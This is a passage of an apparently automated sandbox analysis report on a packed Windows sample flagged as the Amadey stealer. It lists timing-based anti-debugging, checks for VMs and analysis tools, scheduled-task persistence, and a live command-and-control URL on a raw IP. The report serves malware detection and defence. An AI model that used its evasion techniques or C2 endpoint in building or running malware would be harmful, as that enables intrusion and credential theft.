                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390A7C second address: 5390A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390B2F second address: 5390B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov esp, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F84B0D655FAh 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390B43 second address: 5390B55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84B0B050DEh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0D16 second address: 53A0D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0D1B second address: 53A0D21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0D21 second address: 53A0D25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0D25 second address: 53A0D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F84B0B050E8h 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0D48 second address: 53A0D89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D655FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F84B0D65606h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F84B0D65607h 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0AB1 second address: 53A0AEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov al, bh 0x0000000d movzx eax, di 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F84B0B050DBh 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push ebx 0x0000001d pop ecx 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54207B2 second address: 54207B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410A32 second address: 5410A49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410A49 second address: 5410A8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F84B0D655FEh 0x0000000f mov ebp, esp 0x00000011 jmp 00007F84B0D65600h 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410A8E second address: 5410A94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541086C second address: 5410872 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410872 second address: 5410878 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410878 second address: 541087C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0144 second address: 53B0148 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0148 second address: 53B014E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B014E second address: 53B01AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F84B0B050E2h 0x00000009 or si, 7CB8h 0x0000000e jmp 00007F84B0B050DBh 0x00000013 popfd 0x00000014 jmp 00007F84B0B050E8h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [esp], ebp 0x0000001f pushad 0x00000020 mov esi, 4BC3F7ADh 0x00000025 mov ebx, eax 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a pushad 0x0000002b movzx esi, di 0x0000002e mov ebx, 2BAE4092h 0x00000033 popad 0x00000034 pop ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B01AF second address: 53B01B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B01B3 second address: 53B01B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410C0A second address: 5410C3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65605h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cl, 67h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 mov ax, dx 0x00000013 popad 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov esi, 72E32E7Fh 0x0000001f popad 0x00000020 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410C3A second address: 5410CBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d mov ah, 4Ch 0x0000000f popad 0x00000010 push dword ptr [ebp+08h] 0x00000013 jmp 00007F84B0B050E5h 0x00000018 push 89E7DEA1h 0x0000001d pushad 0x0000001e pushad 0x0000001f mov edx, 6F500E5Eh 0x00000024 movsx edi, cx 0x00000027 popad 0x00000028 pushfd 0x00000029 jmp 00007F84B0B050E0h 0x0000002e adc ch, 00000028h 0x00000031 jmp 00007F84B0B050DBh 0x00000036 popfd 0x00000037 popad 0x00000038 add dword ptr [esp], 76192161h 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F84B0B050E5h 0x00000046 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410CBC second address: 5410CC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410D24 second address: 5410D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410D29 second address: 5410D3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84B0D65602h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23DA5D second address: 23DA81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a js 00007F84B0B050D6h 0x00000010 pop edx 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23DC45 second address: 23DC49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23DC49 second address: 23DC4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23DC4F second address: 23DC7A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F84B0D655FBh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F84B0D65607h 0x00000014 jmp 00007F84B0D65601h 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0657 second address: 53C065D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Tries to evade debugger and weak emulator (self modifying code)
                  Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7EB2F instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7EA4D instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7C276 instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 2BAAAE instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 46EB2F instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 46EA4D instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 46C276 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 6AAAAE instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05410BDB rdtsc 0_2_05410BDB
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1176Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 525Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1230Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1189Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8124Thread sleep count: 33 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8124Thread sleep time: -66033s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8104Thread sleep count: 1176 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8104Thread sleep time: -2353176s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8084Thread sleep count: 525 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8084Thread sleep time: -15750000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8112Thread sleep count: 1230 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8112Thread sleep time: -2461230s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7176Thread sleep time: -360000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8108Thread sleep count: 1189 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8108Thread sleep time: -2379189s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 30000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                  Source: axplong.exe, axplong.exe, 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                  Source: axplong.exe, 00000006.00000002.2627219543.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.2627219543.0000000000C69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: file.exe, 00000000.00000002.1418391064.0000000000213000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.1443906022.0000000000603000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                  Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Hides threads from debuggers
                  Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                  Tries to detect sandboxes and other dynamic analysis tools (window names)
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: regmonclass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: gbdyllo
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: procmon_window_class
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: ollydbg
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: filemonclass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: NTICE
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SICE
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SIWVID
                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05410BDB rdtsc 0_2_05410BDB
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_0043645B mov eax, dword ptr fs:[00000030h]6_2_0043645B
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_0043A1C2 mov eax, dword ptr fs:[00000030h]6_2_0043A1C2
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                  Source: file.exe, 00000000.00000002.1418391064.0000000000213000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.1443906022.0000000000603000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: -](Program Manager
                  Source: axplong.exeBinary or memory string: -](Program Manager
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_0041D312 cpuid 6_2_0041D312
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_0041CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,6_2_0041CB1A

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Amadeys stealer DLL
                  Source: Yara matchFile source: 0.2.file.exe.10000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.axplong.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.axplong.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000003.1403500499.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.1963827399.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1378088248.0000000005200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1418313558.0000000000011000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1443822866.0000000000401000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                  Command and Scripting Interpreter                  		1
                  Scheduled Task/Job                  		12
                  Process Injection                  		1
                  Masquerading                  		OS Credential Dumping1
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job                  		1
                  DLL Side-Loading                  		1
                  Scheduled Task/Job                  		251
                  Virtualization/Sandbox Evasion                  		LSASS Memory741
                  Security Software Discovery                  		Remote Desktop ProtocolData from Removable Media1
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  DLL Side-Loading                  		12
                  Process Injection                  		Security Account Manager2
                  Process Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                  Obfuscated Files or Information                  		NTDS251
                  Virtualization/Sandbox Evasion                  		Distributed Component Object ModelInput Capture11
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                  Software Packing                  		LSA Secrets1
                  Application Window Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials1
                  File and Directory Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync224
                  System Information Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  file.exe53%ReversingLabsWin32.Packed.Themida
                  file.exe100%AviraTR/Crypt.TPM.Gen
                  file.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%AviraTR/Crypt.TPM.Gen
                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe53%ReversingLabsWin32.Packed.Themida

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  No Antivirus matches

                  Domains and IPs

                  Contacted Domains

                  No contacted domains info

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://185.215.113.16/Jo89Ku7d/index.phptrue
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.16/Jo89Ku7d/index.phpMaxplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.16/Jo89Ku7d/index.phpOF_iaxplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.16/Jo89Ku7d/index.phpdedaxplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.16/Jo89Ku7d/index.phpncoded6axplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://185.215.113.16/Jo89Ku7d/index.phpEaxplong.exe, 00000006.00000002.2627219543.0000000000C69000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://185.215.113.16/Jo89Ku7d/index.phpDaxplong.exe, 00000006.00000002.2627219543.0000000000C69000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://185.215.113.16/Jo89Ku7d/index.phpQaxplong.exe, 00000006.00000002.2627219543.0000000000C69000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://185.215.113.16/Jo89Ku7d/index.phpncodedaxplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://185.215.113.16/Jo89Ku7d/index.phpncodednaxplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      185.215.113.16
                                      		unknownPortugal
                                      		206894WHOLESALECONNECTIONSNLtrue

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1520516
                                      Start date and time:2024-09-27 12:53:07 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 5m 35s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:9
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:file.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@4/3@0/1
                                      EGA Information:
                                      • Successful, ratio: 33.3%
                                      HCA Information:Failed
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target axplong.exe, PID 7576 because there are no executed function
                                      • Execution Graph export aborted for target file.exe, PID 7352 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • VT rate limit hit for: file.exe

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      06:55:01API Interceptor234084x Sleep call for process: axplong.exe modified
                                      11:54:03Task SchedulerRun new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      185.215.113.16file.exeGet hashmaliciousAmadeyBrowse
                                      • 185.215.113.16/Jo89Ku7d/index.php
                                      file.exeGet hashmaliciousAmadeyBrowse
                                      • 185.215.113.16/Jo89Ku7d/index.php
                                      8y4qT1eVpi.exeGet hashmaliciousAmadey, StealcBrowse
                                      • 185.215.113.16/soka/random.exe
                                      file.exeGet hashmaliciousAmadeyBrowse
                                      • 185.215.113.16/Jo89Ku7d/index.php
                                      file.exeGet hashmaliciousAmadeyBrowse
                                      • 185.215.113.16/Jo89Ku7d/index.php
                                      file.exeGet hashmaliciousAmadeyBrowse
                                      • 185.215.113.16/Jo89Ku7d/index.php
                                      file.exeGet hashmaliciousAmadeyBrowse
                                      • 185.215.113.16/Jo89Ku7d/index.php
                                      file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5SystemzBrowse
